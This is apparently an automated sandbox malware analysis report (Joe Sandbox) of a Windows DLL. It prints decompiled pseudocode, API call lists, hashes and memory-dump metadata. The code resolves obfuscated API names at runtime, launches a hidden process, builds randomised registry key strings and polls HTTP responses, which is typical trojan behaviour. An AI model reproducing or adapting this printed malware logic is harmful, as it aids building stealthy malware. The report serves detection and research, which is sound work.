                    				_t89 = _t95;
                    				_t96 = _t95 - 8;
                    				_push(_t65);
                    				_push(_t84);
                    				_push(_t89);
                    				asm("cld");
                    				_t66 = _a8;
                    				_t44 = _a4;
                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                    					_push(_t89);
                    					E010C8347(_t66 + 0x10, _t66, 0xffffffff);
                    					_t46 = 1;
                    				} else {
                    					_v12 = _t44;
                    					_v8 = _a12;
                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                    					_t86 =  *(_t66 + 0xc);
                    					_t80 =  *(_t66 + 8);
                    					_t49 = E010C8401(_t66);
                    					_t99 = _t96 + 4;
                    					if(_t49 == 0) {
                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    						goto L11;
                    					} else {
                    						while(_t86 != 0xffffffff) {
                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                    							if(_t53 == 0) {
                    								L8:
                    								_t80 =  *(_t66 + 8);
                    								_t86 = _t80[_t86 + _t86 * 2];
                    								continue;
                    							} else {
                    								_t54 =  *_t53();
                    								_t89 = _t89;
                    								_t86 = _t86;
                    								_t66 = _a8;
                    								_t55 = _t54;
                    								_t106 = _t54;
                    								if(_t106 == 0) {
                    									goto L8;
                    								} else {
                    									if(_t106 < 0) {
                    										_t46 = 0;
                    									} else {
                    										_t82 =  *(_t66 + 8);
                    										E010C82EC(_t55, _t66);
                    										_t89 = _t66 + 0x10;
                    										E010C8347(_t89, _t66, 0);
                    										_t99 = _t99 + 0xc;
                    										E010C83E3(_t82[2]);
                    										 *(_t66 + 0xc) =  *_t82;
                    										_t66 = 0;
                    										_t86 = 0;
                    										 *(_t82[2])(1);
                    										goto L8;
                    									}
                    								}
                    							}
                    							goto L13;
                    						}
                    						L11:
                    						_t46 = 1;
                    					}
                    				}
                    				L13:
                    				return _t46;
                    			}
























                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                    • Instruction ID: 14f16fd56205e495f32f2f3ec5f8d48be325015b2877bcba45002199899c7bd0
                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                    • Instruction Fuzzy Hash: 5821F1329006059FCB10EF68C8848AFBBA6FF44310B0AC1AED9959B245DB30F915CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E010C196A(void* __eax, void* __ecx) {
                    				long _v8;
                    				char _v12;
                    				void* _v16;
                    				void* _v28;
                    				long _v32;
                    				void _v104;
                    				char _v108;
                    				long _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t47;
                    				intOrPtr _t50;
                    				void* _t58;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t71;
                    
                    				_t1 = __eax + 0x14; // 0x74183966
                    				_t69 =  *_t1;
                    				_t36 = E010C624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                    				_v8 = _t36;
                    				if(_t36 != 0) {
                    					L12:
                    					return _v8;
                    				}
                    				E010C7961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                    				_t40 = _v12(_v12);
                    				_v8 = _t40;
                    				if(_t40 == 0 && ( *0x10ca300 & 0x00000001) != 0) {
                    					_v32 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v108 = 0;
                    					memset( &_v104, 0, 0x40);
                    					_t47 =  *0x10ca320; // 0x26dd5a8
                    					_t18 = _t47 + 0x10cb3e6; // 0x73797325
                    					_t68 = E010C1E10(_t18);
                    					if(_t68 == 0) {
                    						_v8 = 8;
                    					} else {
                    						_t50 =  *0x10ca320; // 0x26dd5a8
                    						_t19 = _t50 + 0x10cb747; // 0x37a8cef
                    						_t20 = _t50 + 0x10cb0af; // 0x4e52454b
                    						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                    						if(_t71 == 0) {
                    							_v8 = 0x7f;
                    						} else {
                    							_v108 = 0x44;
                    							E010C6381();
                    							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                    							_push(1);
                    							E010C6381();
                    							if(_t58 == 0) {
                    								_v8 = GetLastError();
                    							} else {
                    								CloseHandle(_v28);
                    								CloseHandle(_v32);
                    							}
                    						}
                    						HeapFree( *0x10ca2d8, 0, _t68);
                    					}
                    				}
                    				_t70 = _v16;
                    				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                    				E010C17AB(_t70);
                    				goto L12;
                    			}



















                    APIs
                      • Part of subcall function 010C624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,010C1986,?,?,?,?,00000000,00000000), ref: 010C6274
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 010C6296
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 010C62AC
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010C62C2
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010C62D8
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010C62EE
                    • memset.NTDLL ref: 010C19D4
                      • Part of subcall function 010C1E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010C19ED,73797325), ref: 010C1E21
                      • Part of subcall function 010C1E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 010C1E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,037A8CEF,73797325), ref: 010C1A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 010C1A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C1A79
                      • Part of subcall function 010C6381: GetProcAddress.KERNEL32(36776F57,010C793C), ref: 010C639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 010C1A56
                    • CloseHandle.KERNEL32(?), ref: 010C1A5B
                    • GetLastError.KERNEL32(00000001), ref: 010C1A5F
                    Strings
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 5f831f4386f8642423da0fb324fb97b8c7b43dd3a2fc6d6cbb9fa0732f529ca8
                    • Instruction ID: 1a406b247439ccde70e696b06564d4771b55ceaee9d3ddd59afcb07c9feff295
                    • Opcode Fuzzy Hash: 5f831f4386f8642423da0fb324fb97b8c7b43dd3a2fc6d6cbb9fa0732f529ca8
                    • Instruction Fuzzy Hash: E9314DB2D00209EFDB20AFA8C888DDEBBF8EB08744F104469F685E3152D7359E448F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 43%
                    			E010C266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t58;
                    				signed int _t60;
                    				signed int _t62;
                    				intOrPtr _t64;
                    				intOrPtr _t66;
                    				intOrPtr _t70;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    				intOrPtr _t80;
                    				WCHAR* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				intOrPtr _t92;
                    				intOrPtr* _t102;
                    				signed int _t103;
                    				void* _t104;
                    				intOrPtr _t105;
                    				void* _t107;
                    				intOrPtr* _t115;
                    				void* _t119;
                    				intOrPtr _t125;
                    
                    				_t58 =  *0x10ca3dc; // 0x37a9c00
                    				_v24 = _t58;
                    				_v28 = 8;
                    				_v20 = GetTickCount();
                    				_t60 = E010C2E72();
                    				_t103 = 5;
                    				_t98 = _t60 % _t103 + 6;
                    				_t62 = E010C2E72();
                    				_t117 = _t62 % _t103 + 6;
                    				_v32 = _t62 % _t103 + 6;
                    				_t64 = E010C2F7B(_t60 % _t103 + 6);
                    				_v16 = _t64;
                    				if(_t64 != 0) {
                    					_t66 = E010C2F7B(_t117);
                    					_v12 = _t66;
                    					if(_t66 != 0) {
                    						_push(5);
                    						_t104 = 0xa;
                    						_t119 = E010C1289(_t104,  &_v20);
                    						if(_t119 == 0) {
                    							_t119 = 0x10c918c;
                    						}
                    						_t70 = E010C1DDD(_v24);
                    						_v8 = _t70;
                    						if(_t70 != 0) {
                    							_t115 = __imp__;
                    							_t72 =  *_t115(_t119);
                    							_t75 =  *_t115(_v8);
                    							_t76 =  *_t115(_a4);
                    							_t80 = E010C63FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                    							_v24 = _t80;
                    							if(_t80 != 0) {
                    								_t105 =  *0x10ca320; // 0x26dd5a8
                    								_t102 =  *0x10ca134; // 0x10c7ca9
                    								_t28 = _t105 + 0x10cbb08; // 0x530025
                    								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                    								_push(4);
                    								_t107 = 5;
                    								_t83 = E010C1289(_t107,  &_v20);
                    								_a8 = _t83;
                    								if(_t83 == 0) {
                    									_a8 = 0x10c9190;
                    								}
                    								_t84 =  *_t115(_a8);
                    								_t85 =  *_t115(_v8);
                    								_t86 =  *_t115(_a4);
                    								_t125 = E010C63FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                    								if(_t125 == 0) {
                    									E010C17AB(_v24);
                    								} else {
                    									_t92 =  *0x10ca320; // 0x26dd5a8
                    									_t44 = _t92 + 0x10cbc80; // 0x73006d
                    									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                    									 *_a16 = _v24;
                    									_v28 = _v28 & 0x00000000;
                    									 *_a20 = _t125;
                    								}
                    							}
                    							E010C17AB(_v8);
                    						}
                    						E010C17AB(_v12);
                    					}
                    					E010C17AB(_v16);
                    				}
                    				return _v28;
                    			}




































                    APIs
                    • GetTickCount.KERNEL32 ref: 010C2682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 010C2703
                    • lstrlen.KERNEL32(?), ref: 010C2714
                    • lstrlen.KERNEL32(00000000), ref: 010C271B
                    • lstrlenW.KERNEL32(80000002), ref: 010C2722
                    • lstrlen.KERNEL32(?,00000004), ref: 010C278B
                    • lstrlen.KERNEL32(?), ref: 010C2794
                    • lstrlen.KERNEL32(?), ref: 010C279B
                    • lstrlenW.KERNEL32(?), ref: 010C27A2
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: c30265e59d676593daad0227a6222e087211c5923d971b1a1f63218bcd45130c
                    • Instruction ID: 88581233ff81254e37e454a86d9ada9ba12199feed0e59541fced6d97790e553
                    • Opcode Fuzzy Hash: c30265e59d676593daad0227a6222e087211c5923d971b1a1f63218bcd45130c
                    • Instruction Fuzzy Hash: 4E518832D0020AEFCF11AFA8CC44ADE7BB5AF44714F058068F944A7251DB368A25DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C58EE(void* __ecx, void* __esi) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				long _v20;
                    				long _t34;
                    				long _t39;
                    				long _t42;
                    				long _t56;
                    				void* _t58;
                    				void* _t59;
                    				void* _t61;
                    
                    				_t61 = __esi;
                    				_t59 = __ecx;
                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                    				do {
                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                    					_v20 = _t34;
                    					if(_t34 != 0) {
                    						L3:
                    						_v8 = 4;
                    						_v16 = 0;
                    						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                    							_t39 = GetLastError();
                    							_v12 = _t39;
                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                    								L15:
                    								return _v12;
                    							} else {
                    								goto L11;
                    							}
                    						}
                    						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                    							goto L11;
                    						} else {
                    							_v16 = 0;
                    							_v8 = 0;
                    							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                    							_t58 = E010C63FD(_v8 + 1);
                    							if(_t58 == 0) {
                    								_v12 = 8;
                    							} else {
                    								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                    									E010C17AB(_t58);
                    									_v12 = GetLastError();
                    								} else {
                    									 *((char*)(_t58 + _v8)) = 0;
                    									 *(_t61 + 0xc) = _t58;
                    								}
                    							}
                    							goto L15;
                    						}
                    					}
                    					SetEvent( *(_t61 + 0x1c));
                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                    					_v12 = _t56;
                    					if(_t56 != 0) {
                    						goto L15;
                    					}
                    					goto L3;
                    					L11:
                    					_t42 = E010C5867( *(_t61 + 0x1c), _t59, 0xea60);
                    					_v12 = _t42;
                    				} while (_t42 == 0);
                    				goto L15;
                    			}















                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 010C5905
                    • SetEvent.KERNEL32(?), ref: 010C5915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 010C5947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C598C
                    • GetLastError.KERNEL32 ref: 010C599E
                      • Part of subcall function 010C5867: WaitForMultipleObjects.KERNEL32(00000002,010C7AF8,00000000,010C7AF8,?,?,?,010C7AF8,0000EA60), ref: 010C5882
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • GetLastError.KERNEL32(00000000), ref: 010C59D3
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: ba944f9d7d0618b59a37ce3891c6aab81ab3b79e7a0d55ef55bc5e3f267b5376
                    • Instruction ID: 321eb85d34014e78b8d40e4604c55fc9397799591cedef0dceb7fabe142f5403
                    • Opcode Fuzzy Hash: ba944f9d7d0618b59a37ce3891c6aab81ab3b79e7a0d55ef55bc5e3f267b5376
                    • Instruction Fuzzy Hash: 16310AB9A00309EFDB21DF99CC819DEBBF8EB09754F1045AEE582A2141D771AA449F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 010C4D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 010C4D17
                    • SysAllocString.OLEAUT32(00000000), ref: 010C4D29
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4DA7
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: b31ae57115d135d0b3497272a55047f60283b23d9c77424307e57e496e2e186e
                    • Instruction ID: db75741a5400faa864e7d78f26affacee4f7bc3dccaa81580ab510711c7f9a11
                    • Opcode Fuzzy Hash: b31ae57115d135d0b3497272a55047f60283b23d9c77424307e57e496e2e186e
                    • Instruction Fuzzy Hash: 89315E32D00609AFDB51EFACC844ADEBBB6BF49704F144469EA50EB110DB759905CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				intOrPtr _v8;
                    				intOrPtr _t23;
                    				intOrPtr _t26;
                    				_Unknown_base(*)()* _t28;
                    				intOrPtr _t30;
                    				_Unknown_base(*)()* _t32;
                    				intOrPtr _t33;
                    				_Unknown_base(*)()* _t35;
                    				intOrPtr _t36;
                    				_Unknown_base(*)()* _t38;
                    				intOrPtr _t39;
                    				_Unknown_base(*)()* _t41;
                    				intOrPtr _t44;
                    				struct HINSTANCE__* _t48;
                    				intOrPtr _t54;
                    
                    				_t54 = E010C63FD(0x20);
                    				if(_t54 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t23 =  *0x10ca320; // 0x26dd5a8
                    					_t1 = _t23 + 0x10cb11a; // 0x4c44544e
                    					_t48 = GetModuleHandleA(_t1);
                    					_t26 =  *0x10ca320; // 0x26dd5a8
                    					_t2 = _t26 + 0x10cb769; // 0x7243775a
                    					_v8 = 0x7f;
                    					_t28 = GetProcAddress(_t48, _t2);
                    					 *(_t54 + 0xc) = _t28;
                    					if(_t28 == 0) {
                    						L8:
                    						E010C17AB(_t54);
                    					} else {
                    						_t30 =  *0x10ca320; // 0x26dd5a8
                    						_t5 = _t30 + 0x10cb756; // 0x614d775a
                    						_t32 = GetProcAddress(_t48, _t5);
                    						 *(_t54 + 0x10) = _t32;
                    						if(_t32 == 0) {
                    							goto L8;
                    						} else {
                    							_t33 =  *0x10ca320; // 0x26dd5a8
                    							_t7 = _t33 + 0x10cb40b; // 0x6e55775a
                    							_t35 = GetProcAddress(_t48, _t7);
                    							 *(_t54 + 0x14) = _t35;
                    							if(_t35 == 0) {
                    								goto L8;
                    							} else {
                    								_t36 =  *0x10ca320; // 0x26dd5a8
                    								_t9 = _t36 + 0x10cb4d2; // 0x4e6c7452
                    								_t38 = GetProcAddress(_t48, _t9);
                    								 *(_t54 + 0x18) = _t38;
                    								if(_t38 == 0) {
                    									goto L8;
                    								} else {
                    									_t39 =  *0x10ca320; // 0x26dd5a8
                    									_t11 = _t39 + 0x10cb779; // 0x6c43775a
                    									_t41 = GetProcAddress(_t48, _t11);
                    									 *(_t54 + 0x1c) = _t41;
                    									if(_t41 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                    										_t44 = E010C462B(_t54, _a8);
                    										_v8 = _t44;
                    										if(_t44 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a12 = _t54;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}



















                    APIs
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,010C1986,?,?,?,?,00000000,00000000), ref: 010C6274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 010C6296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 010C62AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010C62C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010C62D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010C62EE
                      • Part of subcall function 010C462B: memset.NTDLL ref: 010C46AA
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 16e034b3de3ff4b009e07606ffbf5a7b10ffa3fc51aa9c0b393da13747786451
                    • Instruction ID: bf8036b41a6608c9f34192a7d30fae40995744f0f2a640c1690b2408ddcfca24
                    • Opcode Fuzzy Hash: 16e034b3de3ff4b009e07606ffbf5a7b10ffa3fc51aa9c0b393da13747786451
                    • Instruction Fuzzy Hash: E62160B160020AEFD770DF68C844E9E7BECFB49644B088169F985D7301E77AE9098F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E010C2B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                    				signed int _v8;
                    				char _v12;
                    				signed int* _v16;
                    				char _v284;
                    				void* __esi;
                    				char* _t59;
                    				intOrPtr* _t60;
                    				intOrPtr _t64;
                    				char _t65;
                    				intOrPtr _t68;
                    				intOrPtr _t69;
                    				intOrPtr _t71;
                    				void* _t73;
                    				signed int _t81;
                    				void* _t91;
                    				void* _t92;
                    				char _t98;
                    				signed int* _t100;
                    				intOrPtr* _t101;
                    				void* _t102;
                    
                    				_t92 = __ecx;
                    				_v8 = _v8 & 0x00000000;
                    				_t98 = _a16;
                    				if(_t98 == 0) {
                    					__imp__( &_v284,  *0x10ca3dc);
                    					_t91 = 0x80000002;
                    					L6:
                    					_t59 = E010C5406( &_v284,  &_v284);
                    					_a8 = _t59;
                    					if(_t59 == 0) {
                    						_v8 = 8;
                    						L29:
                    						_t60 = _a20;
                    						if(_t60 != 0) {
                    							 *_t60 =  *_t60 + 1;
                    						}
                    						return _v8;
                    					}
                    					_t101 = _a24;
                    					if(E010C7488(_t92, _t97, _t101, _t91, _t59) != 0) {
                    						L27:
                    						E010C17AB(_a8);
                    						goto L29;
                    					}
                    					_t64 =  *0x10ca318; // 0x37a9d58
                    					_t16 = _t64 + 0xc; // 0x37a9e7a
                    					_t65 = E010C5406(_t64,  *_t16);
                    					_a24 = _t65;
                    					if(_t65 == 0) {
                    						L14:
                    						_t29 = _t101 + 0x14; // 0x102
                    						_t33 = _t101 + 0x10; // 0x3d010c90
                    						if(E010C5B98(_t97,  *_t33, _t91, _a8,  *0x10ca3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                    							_t68 =  *0x10ca320; // 0x26dd5a8
                    							if(_t98 == 0) {
                    								_t35 = _t68 + 0x10cba3f; // 0x4d4c4b48
                    								_t69 = _t35;
                    							} else {
                    								_t34 = _t68 + 0x10cb8e7; // 0x55434b48
                    								_t69 = _t34;
                    							}
                    							if(E010C266A(_t69,  *0x10ca3d4,  *0x10ca3d8,  &_a24,  &_a16) == 0) {
                    								if(_t98 == 0) {
                    									_t71 =  *0x10ca320; // 0x26dd5a8
                    									_t44 = _t71 + 0x10cb846; // 0x74666f53
                    									_t73 = E010C5406(_t44, _t44);
                    									_t99 = _t73;
                    									if(_t73 == 0) {
                    										_v8 = 8;
                    									} else {
                    										_t47 = _t101 + 0x10; // 0x3d010c90
                    										E010C34EE( *_t47, _t91, _a8,  *0x10ca3d8, _a24);
                    										_t49 = _t101 + 0x10; // 0x3d010c90
                    										E010C34EE( *_t49, _t91, _t99,  *0x10ca3d0, _a16);
                    										E010C17AB(_t99);
                    									}
                    								} else {
                    									_t40 = _t101 + 0x10; // 0x3d010c90
                    									E010C34EE( *_t40, _t91, _a8,  *0x10ca3d8, _a24);
                    									_t43 = _t101 + 0x10; // 0x3d010c90
                    									E010C34EE( *_t43, _t91, _a8,  *0x10ca3d0, _a16);
                    								}
                    								if( *_t101 != 0) {
                    									E010C17AB(_a24);
                    								} else {
                    									 *_t101 = _a16;
                    								}
                    							}
                    						}
                    						goto L27;
                    					}
                    					_t21 = _t101 + 0x10; // 0x3d010c90
                    					_t81 = E010C1BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                    					if(_t81 == 0) {
                    						_t100 = _v16;
                    						if(_v12 == 0x28) {
                    							 *_t100 =  *_t100 & _t81;
                    							_t26 = _t101 + 0x10; // 0x3d010c90
                    							E010C5B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                    						}
                    						E010C17AB(_t100);
                    						_t98 = _a16;
                    					}
                    					E010C17AB(_a24);
                    					goto L14;
                    				}
                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                    					goto L29;
                    				} else {
                    					_t97 = _a8;
                    					E010C7961(_t98, _a8,  &_v284);
                    					__imp__(_t102 + _t98 - 0x117,  *0x10ca3dc);
                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                    					_t91 = 0x80000003;
                    					goto L6;
                    				}
                    			}
























                    APIs
                    • StrChrA.SHLWAPI(010C1850,0000005F,00000000,00000000,00000104), ref: 010C2B51
                    • lstrcpy.KERNEL32(?,?), ref: 010C2B7E
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                      • Part of subcall function 010C34EE: lstrlenW.KERNEL32(?,?,?,010C2CE7,3D010C90,80000002,010C1850,010C5F20,74666F53,4D4C4B48,010C5F20,?,3D010C90,80000002,010C1850,?), ref: 010C3513
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 010C2BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: cd68358fc96b64b10200400b053ee5447bcd84feb8e7239bdb3e9495c7a96746
                    • Instruction ID: a50cca865d50417db3017f33b09bad8de94f5c3f8aaed5167c60392702462ab4
                    • Opcode Fuzzy Hash: cd68358fc96b64b10200400b053ee5447bcd84feb8e7239bdb3e9495c7a96746
                    • Instruction Fuzzy Hash: D4514C3550020EEFDF22AF64DC40EDE7BB9BF18B40F108558FA9596520E736E925AF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E010C4DFF() {
                    				void* _v0;
                    				void** _t3;
                    				void** _t5;
                    				void** _t7;
                    				void** _t8;
                    				void* _t10;
                    
                    				_t3 =  *0x10ca3cc; // 0x37a95b0
                    				__imp__( &(_t3[0x10]));
                    				while(1) {
                    					_t5 =  *0x10ca3cc; // 0x37a95b0
                    					_t1 =  &(_t5[0x16]); // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t7 =  *0x10ca3cc; // 0x37a95b0
                    				_t10 =  *_t7;
                    				if(_t10 != 0 && _t10 != 0x10cb81a) {
                    					HeapFree( *0x10ca2d8, 0, _t10);
                    					_t7 =  *0x10ca3cc; // 0x37a95b0
                    				}
                    				 *_t7 = _v0;
                    				_t8 =  &(_t7[0x10]);
                    				__imp__(_t8);
                    				return _t8;
                    			}










                    APIs
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C4E08
                    • Sleep.KERNEL32(0000000A), ref: 010C4E12
                    • HeapFree.KERNEL32(00000000), ref: 010C4E40
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C4E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: d5cd9de3e18ec68f44c54e0f061cd531df8c5f45c346f311ac44628912fc1fb6
